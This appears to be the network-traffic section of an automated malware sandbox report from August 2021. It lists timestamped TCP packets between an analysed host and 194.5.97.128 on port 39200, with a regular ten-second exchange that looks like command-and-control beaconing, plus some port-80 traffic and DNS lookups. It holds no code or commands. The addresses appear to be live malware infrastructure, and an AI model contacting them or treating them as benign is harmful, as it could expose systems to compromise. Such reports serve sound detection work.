                              Aug 2, 2021 15:03:12.054737091 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.054747105 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.054821968 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.054883957 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.055187941 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.055206060 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.055252075 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.055254936 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.055263996 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.055299997 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.055368900 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.055445910 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.055533886 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.055653095 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.055777073 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.055850983 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.055911064 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.056020975 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.056039095 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.056087971 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.056092024 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.056092978 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.056178093 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.056257010 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.056329966 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.056333065 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.056337118 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.056364059 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.056417942 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.056498051 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.056550026 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.056554079 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.056561947 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.056598902 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.056643009 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.056735992 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.056797981 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.056804895 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.056813002 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.056899071 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.056934118 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.057015896 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.057081938 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.057086945 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.057090044 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.057121992 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.057208061 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.057254076 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.057317972 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.057322025 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.057332039 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.057374954 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.057415962 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.057456017 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.057529926 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.057538033 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.057574034 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.057629108 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.057715893 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.057753086 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.057771921 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.057811975 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.057853937 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.057917118 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.057924032 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.057940006 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.058088064 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.058104038 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.058180094 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.058214903 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.058243036 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.058250904 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.058300018 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.058348894 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.058403015 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.058454037 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.058468103 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.058478117 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.058537006 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.058608055 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.058641911 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.058696032 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.058705091 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.058712959 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.058775902 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.058815956 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.058875084 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.058933973 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.058934927 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.058938980 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.059043884 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.059111118 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.059173107 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.059220076 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.059226990 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.059258938 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.059290886 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.059331894 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.059423923 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.059484005 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.059489012 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.059499979 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.059530020 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.059572935 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.059659004 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.059674978 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.059725046 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.059732914 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.060544014 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.060595989 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.060657024 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.060709000 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.060718060 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.060750961 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.060822010 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.060852051 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.060986996 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.061047077 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.061052084 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.061063051 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.061146021 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.061283112 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.061333895 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.061413050 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.061440945 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.061450005 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.061494112 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.061600924 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.061609030 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.062792063 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.062830925 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.062858105 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.062886000 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.062927961 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.062932968 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.063031912 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.063083887 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.063088894 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.063092947 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.063251019 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.063381910 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.068665028 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.098331928 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.098442078 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.098464966 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.098500967 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.098512888 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.098582029 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.098604918 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.098628998 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.098644018 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.098651886 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.098650932 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.098674059 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.098753929 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.098793983 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.098795891 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.098800898 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.098925114 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.099035978 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.099086046 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.099107981 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.099134922 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.099143982 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.099200010 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.099237919 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.099314928 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.099339008 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.099359989 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.099370003 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.099406958 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.099430084 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.099679947 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.099728107 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.099735975 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.099776030 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.099798918 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.099836111 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.099965096 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.099989891 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.100018978 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.100023031 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.100033998 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.100159883 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.100213051 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.100235939 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.100258112 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.100265026 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.100274086 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.100315094 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.100352049 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.100363016 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.100425005 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:12.101999998 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:12.111176014 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:15.596731901 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:15.596860886 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:15.677026033 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:15.722158909 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:15.722244978 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:16.029788017 CEST4973639200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:16.075258970 CEST3920049736194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:21.353677988 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:21.406029940 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:21.489300013 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:21.572326899 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:31.371530056 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:31.422549009 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:31.429145098 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:31.509607077 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:41.384546041 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:41.390964031 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:41.478131056 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:51.400068045 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:03:51.407814026 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:03:51.493704081 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:04:01.415540934 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:04:01.419898987 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:04:01.493447065 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:04:11.431567907 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:04:11.436808109 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:04:11.524528027 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:04:21.446342945 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:04:21.451208115 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:04:21.508649111 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:04:31.462131977 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:04:31.468518972 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:04:31.539814949 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:04:41.477227926 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:04:41.486490965 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:04:41.555200100 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:04:51.492645979 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:04:51.499546051 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:04:51.570686102 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:05:01.130698919 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:05:01.432708979 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:05:01.508057117 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:05:01.512989998 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:05:01.570427895 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:05:02.042085886 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:05:03.245723963 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:05:05.651741028 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:05:10.464749098 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:05:11.523772001 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:05:11.526886940 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:05:11.601669073 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:05:20.074856997 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:05:21.539102077 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:05:21.590699911 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:05:21.933423042 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:05:22.007736921 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:05:31.554419041 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:05:31.559030056 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:05:31.632371902 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:05:41.569895983 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:05:41.576601028 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:05:41.647880077 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:05:51.585360050 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:05:51.588793993 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:05:51.648979902 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:06:01.601159096 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:06:01.605078936 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:06:01.678889036 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:06:11.616298914 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:06:11.621671915 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:06:11.678539991 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:06:21.631577969 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:06:21.635173082 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:06:21.709731102 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:06:31.647075891 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:06:31.650868893 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:06:31.709690094 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:06:41.662970066 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:06:41.667712927 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:06:41.740551949 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:06:51.678086996 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:06:51.682878017 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:06:51.740369081 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:07:01.693533897 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:07:01.698972940 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:07:01.771390915 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:07:11.709050894 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:07:11.713383913 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:07:11.786915064 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:07:21.726953030 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:07:21.742835999 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:07:21.818212986 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:07:31.739834070 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:07:31.748703957 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:07:31.817822933 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:07:41.755250931 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:07:41.761679888 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:07:41.817559958 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:07:51.770746946 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:07:51.775450945 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:07:51.848913908 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:08:01.786242962 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:08:01.790775061 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:08:01.848465919 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:08:11.801588058 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:08:11.805155039 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:08:11.879512072 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:08:21.817117929 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:08:21.822452068 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:08:21.879365921 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:08:31.832644939 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:08:31.836873055 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:08:31.911048889 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:08:41.848481894 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:08:41.862510920 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:08:41.926040888 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:08:51.863343000 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:08:51.866950035 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:08:51.941294909 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:09:01.878819942 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:09:01.883265018 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:09:01.956892014 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:09:11.894828081 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:09:11.938303947 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:09:12.221292019 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:09:12.284754038 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:09:21.928597927 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:09:21.944806099 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:09:22.021734953 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:09:31.925271034 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:09:31.929434061 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:09:31.987437963 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:09:41.941025972 CEST3920049735194.5.97.128192.168.2.3
                              Aug 2, 2021 15:09:41.946171999 CEST4973539200192.168.2.3194.5.97.128
                              Aug 2, 2021 15:09:42.021928072 CEST3920049735194.5.97.128192.168.2.3

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Aug 2, 2021 15:01:02.679708958 CEST53601528.8.8.8192.168.2.3
                              Aug 2, 2021 15:01:03.987540007 CEST5754453192.168.2.38.8.8.8
                              Aug 2, 2021 15:01:04.015264988 CEST53575448.8.8.8192.168.2.3
                              Aug 2, 2021 15:01:05.756846905 CEST5598453192.168.2.38.8.8.8
                              Aug 2, 2021 15:01:05.781485081 CEST53559848.8.8.8192.168.2.3
                              Aug 2, 2021 15:01:06.778383970 CEST6418553192.168.2.38.8.8.8
                              Aug 2, 2021 15:01:06.805119038 CEST53641858.8.8.8192.168.2.3
                              Aug 2, 2021 15:01:08.096107006 CEST6511053192.168.2.38.8.8.8
                              Aug 2, 2021 15:01:08.136997938 CEST53651108.8.8.8192.168.2.3
                              Aug 2, 2021 15:01:10.938198090 CEST5836153192.168.2.38.8.8.8
